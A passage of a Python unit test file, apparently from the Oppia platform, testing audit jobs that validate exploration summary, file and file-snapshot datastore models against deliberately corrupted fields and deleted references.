        self.owner = user_services.UserActionsInfo(self.owner_id)
        editor_email = 'user@editor.com'
        viewer_email = 'user@viewer.com'
        contributor_email = 'user@contributor.com'
        self.signup(editor_email, 'editor')
        self.signup(viewer_email, 'viewer')
        self.signup(contributor_email, 'contributor')
        self.editor_id = self.get_user_id_from_email(editor_email)
        self.viewer_id = self.get_user_id_from_email(viewer_email)
        self.contributor_id = self.get_user_id_from_email(contributor_email)
        language_codes = ['ar', 'en', 'en']
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            language_code=language_codes[i]
        ) for i in xrange(3)]
        for exp in explorations:
            exp.tags = ['math', 'art']
            exp_services.save_new_exploration(self.owner_id, exp)
        rights_manager.assign_role_for_exploration(
            self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
        exp_services.update_exploration(
            self.contributor_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        rights_manager.assign_role_for_exploration(
            self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
        rating_services.assign_rating_to_exploration(self.user_id, '0', 3)
        rating_services.assign_rating_to_exploration(self.viewer_id, '0', 4)
        self.model_instance_0 = exp_models.ExpSummaryModel.get_by_id('0')
        self.model_instance_1 = exp_models.ExpSummaryModel.get_by_id('1')
        self.model_instance_2 = exp_models.ExpSummaryModel.get_by_id('2')
        # Job class picked up by run_job_and_check_output.
        self.job_class = (
            prod_validation_jobs_one_off.ExpSummaryModelAuditOneOffJob)
    def test_standard_operation(self):
        """All three summary models validate cleanly after a publish and a
        further update.
        """
        rights_manager.publish_exploration(self.owner, '0')
        exp_services.update_exploration(
            self.owner_id, '1', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated ExpSummaryModel\', 3]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time-field
        relation check for that one model only.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExpSummaryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated ExpSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """With the clock mocked 13 hours back, the surviving summary's
        last_updated lies in the future and fails the current-time check.
        Explorations '1' and '2' are deleted first so only one summary
        remains.
        """
        exp_models.ExplorationModel.get_by_id('1').delete(
            self.owner_id, '')
        exp_models.ExplorationModel.get_by_id('2').delete(
            self.owner_id, '')
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExpSummaryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_first_published_datetime_than_current_time(self):
rights_manager.publish_exploration(self.owner, '0')
rights_manager.publish_exploration(self.owner, '1')
self.model_instance_0 = exp_models.ExpSummaryModel.get_by_id('0')
self.model_instance_0.first_published_msec = (
self.model_instance_0.first_published_msec * 1000000.0)
self.model_instance_0.put()
rights_model = exp_models.ExplorationRightsModel.get_by_id('0')
rights_model.first_published_msec = (
self.model_instance_0.first_published_msec)
rights_model.commit(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for first published msec check '
'of ExpSummaryModel\', '
'[u\'Entity id 0: The first_published_msec field has a '
'value %s which is greater than the time when the '
'job was run\']]'
) % (self.model_instance_0.first_published_msec),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_exploration_model_failure(self):
        """Deleting the backing ExplorationModel fails the
        exploration_ids field check.
        """
        exp_models.ExplorationModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids '
                'field check of ExpSummaryModel\', '
                '[u"Entity id 0: based on field exploration_ids having '
                'value 0, expect model ExplorationModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated ExpSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_owner_user_model_failure(self):
        """Deleting an owner's UserSettingsModel fails the
        owner_user_ids field check.
        """
        rights_manager.assign_role_for_exploration(
            self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for owner_user_ids '
                'field check of ExpSummaryModel\', '
                '[u"Entity id 0: based on field owner_user_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
            u'[u\'fully-validated ExpSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_editor_user_model_failure(self):
        """Deleting an editor's UserSettingsModel fails the
        editor_user_ids field check.
        """
        user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for editor_user_ids '
                'field check of ExpSummaryModel\', '
                '[u"Entity id 0: based on field editor_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.editor_id, self.editor_id),
            u'[u\'fully-validated ExpSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_viewer_user_model_failure(self):
        """Deleting a viewer's UserSettingsModel fails the
        viewer_user_ids field check (reported against entity 2).
        """
        user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for viewer_user_ids '
                'field check of ExpSummaryModel\', '
                '[u"Entity id 2: based on field viewer_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.viewer_id, self.viewer_id),
            u'[u\'fully-validated ExpSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_contributor_user_model_failure(self):
        """Deleting a contributor's UserSettingsModel fails the
        contributor_user_ids field check.
        """
        user_models.UserSettingsModel.get_by_id(self.contributor_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for contributor_user_ids '
                'field check of ExpSummaryModel\', '
                '[u"Entity id 0: based on field contributor_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.contributor_id, self.contributor_id),
            u'[u\'fully-validated ExpSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_exploration_model_last_updated(self):
        """An exploration_model_last_updated that disagrees with the last
        human commit time fails the exploration model last updated check.
        """
        last_human_update_time = (
            self.model_instance_0.exploration_model_last_updated)
        # Overwrite with a future time that cannot match any commit.
        self.model_instance_0.exploration_model_last_updated = (
            datetime.datetime.utcnow() + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration model last '
                'updated check of ExpSummaryModel\', '
                '[u\'Entity id %s: The exploration_model_last_updated '
                'field: %s does not match the last time a commit was '
                'made by a human contributor: %s\']]'
            ) % (
                self.model_instance_0.id,
                self.model_instance_0.exploration_model_last_updated,
                last_human_update_time),
            u'[u\'fully-validated ExpSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_schema(self):
        """Ratings with keys outside 1-5 fail the domain object check."""
        self.model_instance_0.ratings = {'10': 4, '5': 15}
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for domain object check of '
                'ExpSummaryModel\', '
                '[u\'Entity id 0: Entity fails domain validation with '
                'the error Expected ratings to have keys: 1, 2, 3, 4, 5, '
                'received 10, 5\']]'
            ), u'[u\'fully-validated ExpSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_contributors_summary(self):
sorted_contributor_ids = sorted(
self.model_instance_0.contributors_summary.keys())
self.model_instance_0.contributors_summary = {'invalid': 1}
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for contributors summary '
'check of ExpSummaryModel\', '
'[u"Entity id 0: Contributor ids: [u\'%s\', u\'%s\'] '
'do not match the contributor ids obtained using '
'contributors summary: [u\'invalid\']"]]') % (
sorted_contributor_ids[0], sorted_contributor_ids[1]
),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_exploration_related_property(self):
        """A title that disagrees with the exploration's title fails the
        title field check.
        """
        self.model_instance_0.title = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for title field check of '
                'ExpSummaryModel\', '
                '[u\'Entity id %s: title field in entity: invalid does not '
                'match corresponding exploration title field: New title\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated ExpSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_exploration_rights_related_property(self):
        """A status that disagrees with the exploration rights status
        fails the status field check.
        """
        self.model_instance_0.status = 'public'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for status field check of '
                'ExpSummaryModel\', '
                '[u\'Entity id %s: status field in entity: public does not '
                'match corresponding exploration rights status field: '
                'private\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated ExpSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates FileMetadataModel."""

    def setUp(self):
        """Creates two explorations, each with one FileMetadataModel."""
        super(FileMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        self.model_instance_0 = file_models.FileMetadataModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        self.model_instance_0.commit(self.owner_id, [])
        self.model_instance_1 = file_models.FileMetadataModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        self.model_instance_1.commit(self.owner_id, [])
        self.job_class = (
            prod_validation_jobs_one_off.FileMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        """Valid models are reported as fully-validated."""
        expected_output = [
            u'[u\'fully-validated FileMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, [])
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of FileMetadataModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance_0.id,
                    self.model_instance_0.created_on,
                    self.model_instance_0.last_updated
                ),
            u'[u\'fully-validated FileMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """A last_updated in the future (via mocked datetime) fails the
        current time check.
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        """Deleting the backing ExplorationModel fails the
        exploration_ids field check.
        """
        exp_models.ExplorationModel.get_by_id('exp1').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids field '
                'check of FileMetadataModel\', '
                '[u"Entity id %s: based on field exploration_ids having '
                'value exp1, expect model ExplorationModel with id exp1 but it '
                'doesn\'t exist"]]') % self.model_instance_1.id,
            u'[u\'fully-validated FileMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        """Deleting the version-1 snapshot metadata model fails the
        snapshot_metadata_ids field check.
        """
        file_models.FileMetadataSnapshotMetadataModel.get_by_id(
            '%s-1' % self.model_instance_0.id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of FileMetadataModel\', '
                '[u"Entity id %s: based on field snapshot_metadata_ids '
                'having value %s-1, expect model '
                'FileMetadataSnapshotMetadataModel '
                'with id %s-1 but it doesn\'t exist"]]') % (
                    self.model_instance_0.id, self.model_instance_0.id,
                    self.model_instance_0.id),
            u'[u\'fully-validated FileMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        """Deleting the version-1 snapshot content model fails the
        snapshot_content_ids field check.
        """
        file_models.FileMetadataSnapshotContentModel.get_by_id(
            '%s-1' % self.model_instance_0.id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of FileMetadataModel\', '
                '[u"Entity id %s: based on field snapshot_content_ids having '
                'value %s-1, expect model FileMetadataSnapshotContentModel '
                'with id %s-1 but it doesn\'t exist"]]') % (
                    self.model_instance_0.id, self.model_instance_0.id,
                    self.model_instance_0.id),
            u'[u\'fully-validated FileMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    FileMetadataSnapshotMetadataModel.
    """

    def setUp(self):
        """Creates two file metadata models (one committed by the owner,
        one by a second user) and fetches their v1 snapshot metadata.
        """
        super(FileMetadataSnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        file_metadata_model_0 = file_models.FileMetadataModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        file_metadata_model_0.commit(self.owner_id, [])
        file_metadata_model_1 = file_models.FileMetadataModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        file_metadata_model_1.commit(self.user_id, [])
        self.id_0 = file_metadata_model_0.id
        self.id_1 = file_metadata_model_1.id
        self.model_instance_0 = (
            file_models.FileMetadataSnapshotMetadataModel.get_by_id(
                '%s-1' % self.id_0))
        self.model_instance_1 = (
            file_models.FileMetadataSnapshotMetadataModel.get_by_id(
                '%s-1' % self.id_1))
        self.job_class = (
            prod_validation_jobs_one_off
            .FileMetadataSnapshotMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        """Valid models are reported as fully-validated."""
        expected_output = [
            u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of FileMetadataSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'FileMetadataSnapshotMetadataModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """A last_updated in the future (via mocked datetime) fails the
        current time check.
        """
        self.model_instance_1.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileMetadataSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_file_metadata_model_failure(self):
        """Deleting the parent FileMetadataModel fails the
        file_metadata_ids field check for both of its snapshots.
        """
        file_models.FileMetadataModel.get_by_id(self.id_0).delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for file_metadata_ids '
                'field check of FileMetadataSnapshotMetadataModel\', '
                '[u"Entity id %s-1: based on field file_metadata_ids '
                'having value %s, expect model FileMetadataModel with '
                'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
                'field file_metadata_ids having value %s, expect model '
                'FileMetadataModel with id %s but it doesn\'t exist"]]'
            ) % (
                self.id_0, self.id_0, self.id_0, self.id_0,
                self.id_0, self.id_0
            ),
            u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', 1]']
        run_job_and_check_output(
            self, expected_output, literal_eval=True)

    def test_missing_committer_model_failure(self):
        """Deleting the committer's UserSettingsModel fails the
        committer_ids field check.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of FileMetadataSnapshotMetadataModel\', '
                '[u"Entity id %s-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.id_1, self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'FileMetadataSnapshotMetadataModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_file_metadata_version_in_model_id(self):
        """A snapshot id whose version exceeds the parent model's version
        fails the file metadata model version check.
        """
        model_with_invalid_version_in_id = (
            file_models.FileMetadataSnapshotMetadataModel(
                id='%s-3' % self.id_0, committer_id=self.owner_id,
                commit_type='edit', commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for file metadata model '
                'version check of FileMetadataSnapshotMetadataModel\', '
                '[u\'Entity id %s-3: FileMetadata model corresponding to '
                'id %s has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ) % (self.id_0, self.id_0), (
                u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', '
                '2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataSnapshotContentModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    FileMetadataSnapshotContentModel.
    """

    def setUp(self):
        """Creates two file metadata models and fetches their v1
        snapshot content models.
        """
        super(FileMetadataSnapshotContentModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        file_metadata_model_0 = file_models.FileMetadataModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        file_metadata_model_0.commit(self.owner_id, [])
        file_metadata_model_1 = file_models.FileMetadataModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        file_metadata_model_1.commit(self.owner_id, [])
        self.id_0 = file_metadata_model_0.id
        self.id_1 = file_metadata_model_1.id
        self.model_instance_0 = (
            file_models.FileMetadataSnapshotContentModel.get_by_id(
                '%s-1' % self.id_0))
        self.model_instance_1 = (
            file_models.FileMetadataSnapshotContentModel.get_by_id(
                '%s-1' % self.id_1))
        self.job_class = (
            prod_validation_jobs_one_off
            .FileMetadataSnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """Valid models are reported as fully-validated."""
        expected_output = [
            u'[u\'fully-validated FileMetadataSnapshotContentModel\', 2]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of FileMetadataSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'FileMetadataSnapshotContentModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """A last_updated in the future (via mocked datetime) fails the
        current time check.
        """
        self.model_instance_1.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileMetadataSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_file_metadata_model_failure(self):
        """Deleting the parent FileMetadataModel fails the
        file_metadata_ids field check for both of its snapshots.
        """
        file_models.FileMetadataModel.get_by_id(
            self.id_0).delete(self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for file_metadata_ids '
                'field check of FileMetadataSnapshotContentModel\', '
                '[u"Entity id %s-1: based on field file_metadata_ids '
                'having value %s, expect model FileMetadataModel with '
                'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
                'field file_metadata_ids having value %s, expect model '
                'FileMetadataModel with id %s but it doesn\'t exist"]]'
            ) % (
                self.id_0, self.id_0, self.id_0, self.id_0, self.id_0,
                self.id_0),
            u'[u\'fully-validated FileMetadataSnapshotContentModel\', 1]']
        run_job_and_check_output(self, expected_output, literal_eval=True)

    def test_invalid_file_metadata_version_in_model_id(self):
        """A snapshot id whose version exceeds the parent model's version
        fails the file metadata model version check.
        """
        model_with_invalid_version_in_id = (
            file_models.FileMetadataSnapshotContentModel(
                id='%s-3' % self.id_0))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for file metadata model '
                'version check of FileMetadataSnapshotContentModel\', '
                '[u\'Entity id %s-3: FileMetadata model corresponding to '
                'id %s has a version 1 which is less than '
                'the version 3 in snapshot content model id\']]'
            ) % (self.id_0, self.id_0), (
                u'[u\'fully-validated FileMetadataSnapshotContentModel\', '
                '2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class FileModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates FileModel."""

    def setUp(self):
        """Creates two explorations, each with one FileModel."""
        super(FileModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        self.model_instance_0 = file_models.FileModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        self.model_instance_0.commit(self.owner_id, [])
        self.model_instance_1 = file_models.FileModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        self.model_instance_1.commit(self.owner_id, [])
        self.job_class = (
            prod_validation_jobs_one_off.FileModelAuditOneOffJob)

    def test_standard_operation(self):
        """Valid models are reported as fully-validated."""
        expected_output = [
            u'[u\'fully-validated FileModel\', 2]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, [])
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of FileModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance_0.id,
                    self.model_instance_0.created_on,
                    self.model_instance_0.last_updated
                ),
            u'[u\'fully-validated FileModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """A last_updated in the future (via mocked datetime) fails the
        current time check.
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        """Deleting the backing ExplorationModel fails the
        exploration_ids field check.
        """
        exp_models.ExplorationModel.get_by_id('exp1').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids field '
                'check of FileModel\', '
                '[u"Entity id %s: based on field exploration_ids having '
                'value exp1, expect model ExplorationModel with id exp1 '
                'but it doesn\'t exist"]]') % self.model_instance_1.id,
            u'[u\'fully-validated FileModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        """Deleting the version-1 snapshot metadata model fails the
        snapshot_metadata_ids field check.
        """
        file_models.FileSnapshotMetadataModel.get_by_id(
            '%s-1' % self.model_instance_0.id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of FileModel\', '
                '[u"Entity id %s: based on field snapshot_metadata_ids '
                'having value %s-1, expect model FileSnapshotMetadataModel '
                'with id %s-1 but it doesn\'t exist"]]') % (
                    self.model_instance_0.id, self.model_instance_0.id,
                    self.model_instance_0.id),
            u'[u\'fully-validated FileModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        """Deleting the version-1 snapshot content model fails the
        snapshot_content_ids field check.
        """
        file_models.FileSnapshotContentModel.get_by_id(
            '%s-1' % self.model_instance_0.id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of FileModel\', '
                '[u"Entity id %s: based on field snapshot_content_ids having '
                'value %s-1, expect model FileSnapshotContentModel '
                'with id %s-1 but it doesn\'t exist"]]') % (
                    self.model_instance_0.id, self.model_instance_0.id,
                    self.model_instance_0.id),
            u'[u\'fully-validated FileModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
class FileSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    FileSnapshotMetadataModel.
    """

    def setUp(self):
        """Creates two file models (one committed by the owner, one by a
        second user) and fetches their v1 snapshot metadata.
        """
        super(FileSnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        file_model_0 = file_models.FileModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        file_model_0.commit(self.owner_id, [])
        file_model_1 = file_models.FileModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        file_model_1.commit(self.user_id, [])
        self.id_0 = file_model_0.id
        self.id_1 = file_model_1.id
        self.model_instance_0 = (
            file_models.FileSnapshotMetadataModel.get_by_id(
                '%s-1' % self.id_0))
        self.model_instance_1 = (
            file_models.FileSnapshotMetadataModel.get_by_id(
                '%s-1' % self.id_1))
        self.job_class = (
            prod_validation_jobs_one_off
            .FileSnapshotMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        """Valid models are reported as fully-validated."""
        expected_output = [
            u'[u\'fully-validated FileSnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance_0.created_on = (
